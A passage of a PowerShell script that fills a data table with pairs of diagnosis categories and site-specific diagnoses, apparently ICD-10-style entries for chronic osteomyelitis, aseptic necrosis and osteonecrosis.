sinus, hand","Chronic osteomyelitis with draining sinus, left hand") + $null = $DiagnosisList.Rows.Add("Chronic osteomyelitis with draining sinus, hand","Chronic osteomyelitis with draining sinus, unspecified hand") + $null = $DiagnosisList.Rows.Add("Chronic osteomyelitis with draining sinus, femur","Chronic osteomyelitis with draining sinus, right femur") + $null = $DiagnosisList.Rows.Add("Chronic osteomyelitis with draining sinus, femur","Chronic osteomyelitis with draining sinus, left femur") + $null = $DiagnosisList.Rows.Add("Chronic osteomyelitis with draining sinus, femur","Chronic osteomyelitis with draining sinus, unspecified femur") + $null = $DiagnosisList.Rows.Add("Chronic osteomyelitis with draining sinus, tibia and fibula","Chronic osteomyelitis with draining sinus, right tibia and fibula") + $null = $DiagnosisList.Rows.Add("Chronic osteomyelitis with draining sinus, tibia and fibula","Chronic osteomyelitis with draining sinus, left tibia and fibula") + $null = $DiagnosisList.Rows.Add("Chronic osteomyelitis with draining sinus, tibia and fibula","Chronic osteomyelitis with draining sinus, unspecified tibia and fibula") + $null = $DiagnosisList.Rows.Add("Chronic osteomyelitis with draining sinus, ankle and foot","Chronic osteomyelitis with draining sinus, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Chronic osteomyelitis with draining sinus, ankle and foot","Chronic osteomyelitis with draining sinus, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Chronic osteomyelitis with draining sinus, ankle and foot","Chronic osteomyelitis with draining sinus, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Chronic osteomyelitis with draining sinus, other site","Chronic osteomyelitis with draining sinus, other site") + $null = $DiagnosisList.Rows.Add("Chronic osteomyelitis with draining sinus, multiple sites","Chronic osteomyelitis with draining sinus, multiple sites") + $null = $DiagnosisList.Rows.Add("Other chronic hematogenous osteomyelitis","Other chronic hematogenous osteomyelitis, unspecified site") + $null = $DiagnosisList.Rows.Add("Other chronic hematogenous osteomyelitis, shoulder","Other chronic hematogenous osteomyelitis, right shoulder") + $null = $DiagnosisList.Rows.Add("Other chronic hematogenous osteomyelitis, shoulder","Other chronic hematogenous osteomyelitis, left shoulder") + $null = $DiagnosisList.Rows.Add("Other chronic hematogenous osteomyelitis, shoulder","Other chronic hematogenous osteomyelitis, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Other chronic hematogenous osteomyelitis, humerus","Other chronic hematogenous osteomyelitis, right humerus") + $null = $DiagnosisList.Rows.Add("Other chronic hematogenous osteomyelitis, humerus","Other chronic hematogenous osteomyelitis, left humerus") + $null = $DiagnosisList.Rows.Add("Other chronic hematogenous osteomyelitis, humerus","Other chronic hematogenous osteomyelitis, unspecified humerus") + $null = $DiagnosisList.Rows.Add("Other chronic hematogenous osteomyelitis, radius and ulna","Other chronic hematogenous osteomyelitis, right radius and ulna") + $null = $DiagnosisList.Rows.Add("Other chronic hematogenous osteomyelitis, radius and ulna","Other chronic hematogenous osteomyelitis, left radius and ulna") + $null = $DiagnosisList.Rows.Add("Other chronic hematogenous osteomyelitis, radius and ulna","Other chronic hematogenous osteomyelitis, unspecified radius and ulna") + $null = $DiagnosisList.Rows.Add("Other chronic hematogenous osteomyelitis, hand","Other chronic hematogenous osteomyelitis, right hand") + $null = $DiagnosisList.Rows.Add("Other chronic hematogenous osteomyelitis, hand","Other chronic hematogenous osteomyelitis, left hand") + $null = $DiagnosisList.Rows.Add("Other chronic hematogenous osteomyelitis, hand","Other chronic hematogenous osteomyelitis, unspecified hand") + $null = $DiagnosisList.Rows.Add("Other chronic hematogenous osteomyelitis, femur","Other chronic hematogenous osteomyelitis, right femur") + $null = $DiagnosisList.Rows.Add("Other chronic hematogenous osteomyelitis, femur","Other chronic hematogenous osteomyelitis, left femur") + $null = $DiagnosisList.Rows.Add("Other chronic hematogenous osteomyelitis, femur","Other chronic hematogenous osteomyelitis, unspecified femur") + $null = $DiagnosisList.Rows.Add("Other chronic hematogenous osteomyelitis, tibia and fibula","Other chronic hematogenous osteomyelitis, right tibia and fibula") + $null = $DiagnosisList.Rows.Add("Other chronic hematogenous osteomyelitis, tibia and fibula","Other chronic hematogenous osteomyelitis, left tibia and fibula") + $null = $DiagnosisList.Rows.Add("Other chronic hematogenous osteomyelitis, tibia and fibula","Other chronic hematogenous osteomyelitis, unspecified tibia and fibula") + $null = $DiagnosisList.Rows.Add("Other chronic hematogenous osteomyelitis, ankle and foot","Other chronic hematogenous osteomyelitis, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Other chronic hematogenous osteomyelitis, ankle and foot","Other chronic hematogenous osteomyelitis, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Other chronic hematogenous osteomyelitis, ankle and foot","Other chronic hematogenous osteomyelitis, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Other chronic hematogenous osteomyelitis, other site","Other chronic hematogenous osteomyelitis, other site") + $null = $DiagnosisList.Rows.Add("Other chronic hematogenous osteomyelitis, multiple sites","Other chronic hematogenous osteomyelitis, multiple sites") + $null = $DiagnosisList.Rows.Add("Other chronic osteomyelitis","Other chronic osteomyelitis, unspecified site") + $null = $DiagnosisList.Rows.Add("Other chronic osteomyelitis, shoulder","Other chronic osteomyelitis, right shoulder") + $null = $DiagnosisList.Rows.Add("Other chronic osteomyelitis, shoulder","Other chronic osteomyelitis, left shoulder") + $null = $DiagnosisList.Rows.Add("Other chronic osteomyelitis, shoulder","Other chronic osteomyelitis, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Other chronic osteomyelitis, humerus","Other chronic osteomyelitis, right humerus") + $null = $DiagnosisList.Rows.Add("Other chronic osteomyelitis, humerus","Other chronic osteomyelitis, left humerus") + $null = $DiagnosisList.Rows.Add("Other chronic osteomyelitis, humerus","Other chronic osteomyelitis, unspecified humerus") + $null = $DiagnosisList.Rows.Add("Other chronic osteomyelitis, radius and ulna","Other chronic osteomyelitis, right radius and ulna") + $null = $DiagnosisList.Rows.Add("Other chronic osteomyelitis, radius and ulna","Other chronic osteomyelitis, left radius and ulna") + $null = $DiagnosisList.Rows.Add("Other chronic osteomyelitis, radius and ulna","Other chronic osteomyelitis, unspecified radius and ulna") + $null = $DiagnosisList.Rows.Add("Other chronic osteomyelitis, hand","Other chronic osteomyelitis, right hand") + $null = $DiagnosisList.Rows.Add("Other chronic osteomyelitis, hand","Other chronic osteomyelitis, left hand") + $null = $DiagnosisList.Rows.Add("Other chronic osteomyelitis, hand","Other chronic osteomyelitis, unspecified hand") + $null = $DiagnosisList.Rows.Add("Other chronic osteomyelitis, thigh","Other chronic osteomyelitis, right thigh") + $null = $DiagnosisList.Rows.Add("Other chronic osteomyelitis, thigh","Other chronic osteomyelitis, left thigh") + $null = $DiagnosisList.Rows.Add("Other chronic osteomyelitis, thigh","Other chronic osteomyelitis, unspecified thigh") + $null = $DiagnosisList.Rows.Add("Other chronic osteomyelitis, tibia and fibula","Other chronic osteomyelitis, right tibia and fibula") + $null = $DiagnosisList.Rows.Add("Other chronic osteomyelitis, tibia and fibula","Other chronic osteomyelitis, left tibia and fibula") + $null = $DiagnosisList.Rows.Add("Other chronic osteomyelitis, tibia and fibula","Other chronic osteomyelitis, unspecified tibia and fibula") + $null = $DiagnosisList.Rows.Add("Other chronic osteomyelitis, ankle and foot","Other chronic osteomyelitis, right ankle and foot") + $null = $DiagnosisList.Rows.Add("Other chronic osteomyelitis, ankle and foot","Other chronic osteomyelitis, left ankle and foot") + $null = $DiagnosisList.Rows.Add("Other chronic osteomyelitis, ankle and foot","Other chronic osteomyelitis, unspecified ankle and foot") + $null = $DiagnosisList.Rows.Add("Other chronic osteomyelitis, other site","Other chronic osteomyelitis, other site") + $null = $DiagnosisList.Rows.Add("Other chronic osteomyelitis, multiple sites","Other chronic osteomyelitis, multiple sites") + $null = $DiagnosisList.Rows.Add("Other osteomyelitis","Other osteomyelitis, multiple sites") + $null = $DiagnosisList.Rows.Add("Other osteomyelitis","Other osteomyelitis, shoulder") + $null = $DiagnosisList.Rows.Add("Other osteomyelitis","Other osteomyelitis, upper arm") + $null = $DiagnosisList.Rows.Add("Other osteomyelitis","Other osteomyelitis, forearm") + $null = $DiagnosisList.Rows.Add("Other osteomyelitis","Other osteomyelitis, hand") + $null = $DiagnosisList.Rows.Add("Other osteomyelitis","Other osteomyelitis, thigh") + $null = $DiagnosisList.Rows.Add("Other osteomyelitis","Other osteomyelitis, lower leg") + $null = $DiagnosisList.Rows.Add("Other osteomyelitis","Other osteomyelitis, ankle and foot") + $null = $DiagnosisList.Rows.Add("Other osteomyelitis","Other osteomyelitis, other site") + $null = $DiagnosisList.Rows.Add("Other osteomyelitis","Other osteomyelitis, unspecified sites") + $null = $DiagnosisList.Rows.Add("Osteomyelitis, unspecified","Osteomyelitis, unspecified") + $null = $DiagnosisList.Rows.Add("Idiopathic aseptic necrosis of bone","Idiopathic aseptic necrosis of unspecified bone") + $null = $DiagnosisList.Rows.Add("Idiopathic aseptic necrosis of shoulder","Idiopathic aseptic necrosis of right shoulder") + $null = $DiagnosisList.Rows.Add("Idiopathic aseptic necrosis of shoulder","Idiopathic aseptic necrosis of left shoulder") + $null = $DiagnosisList.Rows.Add("Idiopathic aseptic necrosis of shoulder","Idiopathic aseptic necrosis of unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Idiopathic aseptic necrosis of humerus","Idiopathic aseptic necrosis of right humerus") + $null = $DiagnosisList.Rows.Add("Idiopathic aseptic necrosis of humerus","Idiopathic aseptic necrosis of left humerus") + $null = $DiagnosisList.Rows.Add("Idiopathic aseptic necrosis of humerus","Idiopathic aseptic necrosis of unspecified humerus") + $null = $DiagnosisList.Rows.Add("Idiopathic aseptic necrosis of radius, ulna and carpus","Idiopathic aseptic necrosis of right radius") + $null = $DiagnosisList.Rows.Add("Idiopathic aseptic necrosis of radius, ulna and carpus","Idiopathic aseptic necrosis of left radius") + $null = $DiagnosisList.Rows.Add("Idiopathic aseptic necrosis of radius, ulna and carpus","Idiopathic aseptic necrosis of unspecified radius") + $null = $DiagnosisList.Rows.Add("Idiopathic aseptic necrosis of radius, ulna and carpus","Idiopathic aseptic necrosis of right ulna") + $null = $DiagnosisList.Rows.Add("Idiopathic aseptic necrosis of radius, ulna and carpus","Idiopathic aseptic necrosis of left ulna") + $null = $DiagnosisList.Rows.Add("Idiopathic aseptic necrosis of radius, ulna and carpus","Idiopathic aseptic necrosis of unspecified ulna") + $null = $DiagnosisList.Rows.Add("Idiopathic aseptic necrosis of radius, ulna and carpus","Idiopathic aseptic necrosis of right carpus") + $null = $DiagnosisList.Rows.Add("Idiopathic aseptic necrosis of radius, ulna and carpus","Idiopathic aseptic necrosis of left carpus") + $null = $DiagnosisList.Rows.Add("Idiopathic aseptic necrosis of radius, ulna and carpus","Idiopathic aseptic necrosis of unspecified carpus") + $null = $DiagnosisList.Rows.Add("Idiopathic aseptic necrosis of hand and fingers","Idiopathic aseptic necrosis of right hand") + $null = $DiagnosisList.Rows.Add("Idiopathic aseptic necrosis of hand and fingers","Idiopathic aseptic necrosis of left hand") + $null = $DiagnosisList.Rows.Add("Idiopathic aseptic necrosis of hand and fingers","Idiopathic aseptic necrosis of unspecified hand") + $null = $DiagnosisList.Rows.Add("Idiopathic aseptic necrosis of hand and fingers","Idiopathic aseptic necrosis of right finger(s)") + $null = $DiagnosisList.Rows.Add("Idiopathic aseptic necrosis of hand and fingers","Idiopathic aseptic necrosis of left finger(s)") + $null = $DiagnosisList.Rows.Add("Idiopathic aseptic necrosis of hand and fingers","Idiopathic aseptic necrosis of unspecified finger(s)") + $null = $DiagnosisList.Rows.Add("Idiopathic aseptic necrosis of pelvis and femur","Idiopathic aseptic necrosis of pelvis") + $null = $DiagnosisList.Rows.Add("Idiopathic aseptic necrosis of pelvis and femur","Idiopathic aseptic necrosis of right femur") + $null = $DiagnosisList.Rows.Add("Idiopathic aseptic necrosis of pelvis and femur","Idiopathic aseptic necrosis of left femur") + $null = $DiagnosisList.Rows.Add("Idiopathic aseptic necrosis of pelvis and femur","Idiopathic aseptic necrosis of unspecified femur") + $null = $DiagnosisList.Rows.Add("Idiopathic aseptic necrosis of tibia and fibula","Idiopathic aseptic necrosis of right tibia") + $null = $DiagnosisList.Rows.Add("Idiopathic aseptic necrosis of tibia and fibula","Idiopathic aseptic necrosis of left tibia") + $null = $DiagnosisList.Rows.Add("Idiopathic aseptic necrosis of tibia and fibula","Idiopathic aseptic necrosis of unspecified tibia") + $null = $DiagnosisList.Rows.Add("Idiopathic aseptic necrosis of tibia and fibula","Idiopathic aseptic necrosis of right fibula") + $null = $DiagnosisList.Rows.Add("Idiopathic aseptic necrosis of tibia and fibula","Idiopathic aseptic necrosis of left fibula") + $null = $DiagnosisList.Rows.Add("Idiopathic aseptic necrosis of tibia and fibula","Idiopathic aseptic necrosis of unspecified fibula") + $null = $DiagnosisList.Rows.Add("Idiopathic aseptic necrosis of ankle, foot and toes","Idiopathic aseptic necrosis of right ankle") + $null = $DiagnosisList.Rows.Add("Idiopathic aseptic necrosis of ankle, foot and toes","Idiopathic aseptic necrosis of left ankle") + $null = $DiagnosisList.Rows.Add("Idiopathic aseptic necrosis of ankle, foot and toes","Idiopathic aseptic necrosis of unspecified ankle") + $null = $DiagnosisList.Rows.Add("Idiopathic aseptic necrosis of ankle, foot and toes","Idiopathic aseptic necrosis of right foot") + $null = $DiagnosisList.Rows.Add("Idiopathic aseptic necrosis of ankle, foot and toes","Idiopathic aseptic necrosis of left foot") + $null = $DiagnosisList.Rows.Add("Idiopathic aseptic necrosis of ankle, foot and toes","Idiopathic aseptic necrosis of unspecified foot") + $null = $DiagnosisList.Rows.Add("Idiopathic aseptic necrosis of ankle, foot and toes","Idiopathic aseptic necrosis of right toe(s)") + $null = $DiagnosisList.Rows.Add("Idiopathic aseptic necrosis of ankle, foot and toes","Idiopathic aseptic necrosis of left toe(s)") + $null = $DiagnosisList.Rows.Add("Idiopathic aseptic necrosis of ankle, foot and toes","Idiopathic aseptic necrosis of unspecified toe(s)") + $null = $DiagnosisList.Rows.Add("Idiopathic aseptic necrosis of bone, other site","Idiopathic aseptic necrosis of bone, other site") + $null = $DiagnosisList.Rows.Add("Idiopathic aseptic necrosis of bone, multiple sites","Idiopathic aseptic necrosis of bone, multiple sites") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to drugs","Osteonecrosis due to drugs, unspecified bone") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to drugs, shoulder","Osteonecrosis due to drugs, right shoulder") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to drugs, shoulder","Osteonecrosis due to drugs, left shoulder") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to drugs, shoulder","Osteonecrosis due to drugs, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to drugs, humerus","Osteonecrosis due to drugs, right humerus") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to drugs, humerus","Osteonecrosis due to drugs, left humerus") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to drugs, humerus","Osteonecrosis due to drugs, unspecified humerus") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to drugs of radius, ulna and carpus","Osteonecrosis due to drugs of right radius") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to drugs of radius, ulna and carpus","Osteonecrosis due to drugs of left radius") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to drugs of radius, ulna and carpus","Osteonecrosis due to drugs of unspecified radius") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to drugs of radius, ulna and carpus","Osteonecrosis due to drugs of right ulna") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to drugs of radius, ulna and carpus","Osteonecrosis due to drugs of left ulna") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to drugs of radius, ulna and carpus","Osteonecrosis due to drugs of unspecified ulna") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to drugs of radius, ulna and carpus","Osteonecrosis due to drugs of right carpus") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to drugs of radius, ulna and carpus","Osteonecrosis due to drugs of left carpus") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to drugs of radius, ulna and carpus","Osteonecrosis due to drugs of unspecified carpus") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to drugs, hand and fingers","Osteonecrosis due to drugs, right hand") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to drugs, hand and fingers","Osteonecrosis due to drugs, left hand") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to drugs, hand and fingers","Osteonecrosis due to drugs, unspecified hand") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to drugs, hand and fingers","Osteonecrosis due to drugs, right finger(s)") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to drugs, hand and fingers","Osteonecrosis due to drugs, left finger(s)") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to drugs, hand and fingers","Osteonecrosis due to drugs, unspecified finger(s)") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to drugs, pelvis and femur","Osteonecrosis due to drugs, pelvis") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to drugs, pelvis and femur","Osteonecrosis due to drugs, right femur") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to drugs, pelvis and femur","Osteonecrosis due to drugs, left femur") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to drugs, pelvis and femur","Osteonecrosis due to drugs, unspecified femur") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to drugs, tibia and fibula","Osteonecrosis due to drugs, right tibia") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to drugs, tibia and fibula","Osteonecrosis due to drugs, left tibia") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to drugs, tibia and fibula","Osteonecrosis due to drugs, unspecified tibia") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to drugs, tibia and fibula","Osteonecrosis due to drugs, right fibula") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to drugs, tibia and fibula","Osteonecrosis due to drugs, left fibula") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to drugs, tibia and fibula","Osteonecrosis due to drugs, unspecified fibula") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to drugs, ankle, foot and toes","Osteonecrosis due to drugs, right ankle") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to drugs, ankle, foot and toes","Osteonecrosis due to drugs, left ankle") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to drugs, ankle, foot and toes","Osteonecrosis due to drugs, unspecified ankle") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to drugs, ankle, foot and toes","Osteonecrosis due to drugs, right foot") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to drugs, ankle, foot and toes","Osteonecrosis due to drugs, left foot") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to drugs, ankle, foot and toes","Osteonecrosis due to drugs, unspecified foot") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to drugs, ankle, foot and toes","Osteonecrosis due to drugs, right toe(s)") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to drugs, ankle, foot and toes","Osteonecrosis due to drugs, left toe(s)") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to drugs, ankle, foot and toes","Osteonecrosis due to drugs, unspecified toe(s)") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to drugs, other site","Osteonecrosis due to drugs, jaw") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to drugs, other site","Osteonecrosis due to drugs, other site") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to drugs, multiple sites","Osteonecrosis due to drugs, multiple sites") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to previous trauma","Osteonecrosis due to previous trauma, unspecified bone") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to previous trauma, shoulder","Osteonecrosis due to previous trauma, right shoulder") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to previous trauma, shoulder","Osteonecrosis due to previous trauma, left shoulder") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to previous trauma, shoulder","Osteonecrosis due to previous trauma, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to previous trauma, humerus","Osteonecrosis due to previous trauma, right humerus") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to previous trauma, humerus","Osteonecrosis due to previous trauma, left humerus") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to previous trauma, humerus","Osteonecrosis due to previous trauma, unspecified humerus") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to previous trauma of radius, ulna and carpus","Osteonecrosis due to previous trauma of right radius") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to previous trauma of radius, ulna and carpus","Osteonecrosis due to previous trauma of left radius") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to previous trauma of radius, ulna and carpus","Osteonecrosis due to previous trauma of unspecified radius") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to previous trauma of radius, ulna and carpus","Osteonecrosis due to previous trauma of right ulna") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to previous trauma of radius, ulna and carpus","Osteonecrosis due to previous trauma of left ulna") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to previous trauma of radius, ulna and carpus","Osteonecrosis due to previous trauma of unspecified ulna") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to previous trauma of radius, ulna and carpus","Osteonecrosis due to previous trauma of right carpus") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to previous trauma of radius, ulna and carpus","Osteonecrosis due to previous trauma of left carpus") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to previous trauma of radius, ulna and carpus","Osteonecrosis due to previous trauma of unspecified carpus") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to previous trauma, hand and fingers","Osteonecrosis due to previous trauma, right hand") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to previous trauma, hand and fingers","Osteonecrosis due to previous trauma, left hand") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to previous trauma, hand and fingers","Osteonecrosis due to previous trauma, unspecified hand") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to previous trauma, hand and fingers","Osteonecrosis due to previous trauma, right finger(s)") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to previous trauma, hand and fingers","Osteonecrosis due to previous trauma, left finger(s)") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to previous trauma, hand and fingers","Osteonecrosis due to previous trauma, unspecified finger(s)") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to previous trauma, pelvis and femur","Osteonecrosis due to previous trauma, pelvis") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to previous trauma, pelvis and femur","Osteonecrosis due to previous trauma, right femur") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to previous trauma, pelvis and femur","Osteonecrosis due to previous trauma, left femur") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to previous trauma, pelvis and femur","Osteonecrosis due to previous trauma, unspecified femur") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to previous trauma, tibia and fibula","Osteonecrosis due to previous trauma, right tibia") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to previous trauma, tibia and fibula","Osteonecrosis due to previous trauma, left tibia") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to previous trauma, tibia and fibula","Osteonecrosis due to previous trauma, unspecified tibia") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to previous trauma, tibia and fibula","Osteonecrosis due to previous trauma, right fibula") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to previous trauma, tibia and fibula","Osteonecrosis due to previous trauma, left fibula") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to previous trauma, tibia and fibula","Osteonecrosis due to previous trauma, unspecified fibula") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to previous trauma, ankle, foot and toes","Osteonecrosis due to previous trauma, right ankle") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to previous trauma, ankle, foot and toes","Osteonecrosis due to previous trauma, left ankle") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to previous trauma, ankle, foot and toes","Osteonecrosis due to previous trauma, unspecified ankle") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to previous trauma, ankle, foot and toes","Osteonecrosis due to previous trauma, right foot") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to previous trauma, ankle, foot and toes","Osteonecrosis due to previous trauma, left foot") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to previous trauma, ankle, foot and toes","Osteonecrosis due to previous trauma, unspecified foot") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to previous trauma, ankle, foot and toes","Osteonecrosis due to previous trauma, right toe(s)") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to previous trauma, ankle, foot and toes","Osteonecrosis due to previous trauma, left toe(s)") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to previous trauma, ankle, foot and toes","Osteonecrosis due to previous trauma, unspecified toe(s)") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to previous trauma, other site","Osteonecrosis due to previous trauma, other site") + $null = $DiagnosisList.Rows.Add("Osteonecrosis due to previous trauma, multiple sites","Osteonecrosis due to previous trauma, multiple sites") + $null = $DiagnosisList.Rows.Add("Other secondary osteonecrosis","Other secondary osteonecrosis, unspecified bone") + $null = $DiagnosisList.Rows.Add("Other secondary osteonecrosis, shoulder","Other secondary osteonecrosis, right shoulder") + $null = $DiagnosisList.Rows.Add("Other secondary osteonecrosis, shoulder","Other secondary osteonecrosis, left shoulder") + $null = $DiagnosisList.Rows.Add("Other secondary osteonecrosis, shoulder","Other secondary osteonecrosis, unspecified shoulder") + $null = $DiagnosisList.Rows.Add("Other secondary osteonecrosis, humerus","Other secondary osteonecrosis, right humerus") + $null = $DiagnosisList.Rows.Add("Other secondary osteonecrosis, humerus","Other secondary osteonecrosis, left humerus") + $null = $DiagnosisList.Rows.Add("Other secondary osteonecrosis, humerus","Other secondary osteonecrosis, unspecified humerus") + $null = $DiagnosisList.Rows.Add("Other secondary osteonecrosis of radius, ulna and carpus","Other secondary osteonecrosis of right radius") + $null = $DiagnosisList.Rows.Add("Other secondary osteonecrosis of radius, ulna and carpus","Other secondary osteonecrosis of left radius") + $null = $DiagnosisList.Rows.Add("Other secondary osteonecrosis of radius, ulna and carpus","Other secondary osteonecrosis of unspecified radius") + $null = $DiagnosisList.Rows.Add("Other secondary osteonecrosis of radius, ulna and carpus","Other secondary osteonecrosis of right ulna") + $null = $DiagnosisList.Rows.Add("Other secondary osteonecrosis of radius, ulna and carpus","Other secondary osteonecrosis of left ulna") + $null = $DiagnosisList.Rows.Add("Other secondary osteonecrosis of radius, ulna and carpus","Other secondary osteonecrosis of unspecified ulna") + $null = $DiagnosisList.Rows.Add("Other secondary osteonecrosis of radius, ulna and carpus","Other secondary osteonecrosis of right carpus") + $null = $DiagnosisList.Rows.Add("Other secondary osteonecrosis of radius, ulna and carpus","Other secondary osteonecrosis of left carpus") + $null = $DiagnosisList.Rows.Add("Other secondary osteonecrosis of radius, ulna and carpus","Other secondary osteonecrosis of unspecified carpus") + $null = $DiagnosisList.Rows.Add("Other secondary osteonecrosis, hand and fingers","Other secondary osteonecrosis, right hand") + $null = $DiagnosisList.Rows.Add("Other secondary osteonecrosis, hand and fingers","Other secondary osteonecrosis, left hand") + $null = $DiagnosisList.Rows.Add("Other secondary osteonecrosis, hand and fingers","Other secondary osteonecrosis, unspecified hand") + $null = $DiagnosisList.Rows.Add("Other secondary osteonecrosis, hand and fingers","Other secondary osteonecrosis, right finger(s)") + $null = $DiagnosisList.Rows.Add("Other secondary osteonecrosis, hand and fingers","Other secondary osteonecrosis, left finger(s)") + $null = $DiagnosisList.Rows.Add("Other secondary osteonecrosis, hand and fingers","Other secondary osteonecrosis, unspecified finger(s)") + $null = $DiagnosisList.Rows.Add("Other secondary osteonecrosis, pelvis and femur","Other secondary osteonecrosis, pelvis") + $null = $DiagnosisList.Rows.Add("Other secondary osteonecrosis, pelvis and femur","Other secondary osteonecrosis, right femur") + $null = $DiagnosisList.Rows.Add("Other secondary osteonecrosis, pelvis and femur","Other secondary osteonecrosis, left femur") + $null = $DiagnosisList.Rows.Add("Other secondary osteonecrosis, pelvis and femur","Other secondary osteonecrosis, unspecified femur") + $null = $DiagnosisList.Rows.Add("Other secondary osteonecrosis, tibia and fibula","Other secondary osteonecrosis, right tibia") + $null = $DiagnosisList.Rows.Add("Other secondary osteonecrosis, tibia and fibula","Other secondary osteonecrosis, left tibia") + $null = $DiagnosisList.Rows.Add("Other secondary osteonecrosis, tibia and fibula","Other secondary osteonecrosis, unspecified tibia") + $null = $DiagnosisList.Rows.Add("Other secondary osteonecrosis, tibia and fibula","Other secondary osteonecrosis, right fibula") + $null = $DiagnosisList.Rows.Add("Other secondary osteonecrosis, tibia and fibula","Other secondary osteonecrosis, left fibula") + $null = $DiagnosisList.Rows.Add("Other secondary osteonecrosis, tibia and fibula","Other secondary osteonecrosis, unspecified fibula") + $null = $DiagnosisList.Rows.Add("Other secondary osteonecrosis, ankle and foot","Other secondary osteonecrosis, right ankle") + $null = $DiagnosisList.Rows.Add("Other secondary osteonecrosis, ankle and foot","Other secondary osteonecrosis, left ankle") + $null = $DiagnosisList.Rows.Add("Other secondary osteonecrosis, ankle and foot","Other secondary osteonecrosis, unspecified ankle") + $null = $DiagnosisList.Rows.Add("Other secondary osteonecrosis, ankle and foot","Other secondary osteonecrosis, right foot") + $null = $DiagnosisList.Rows.Add("Other secondary osteonecrosis, ankle and foot","Other secondary osteonecrosis, left foot") + $null = $DiagnosisList.Rows.Add("Other secondary osteonecrosis, ankle and foot","Other secondary osteonecrosis, unspecified foot") + $null = 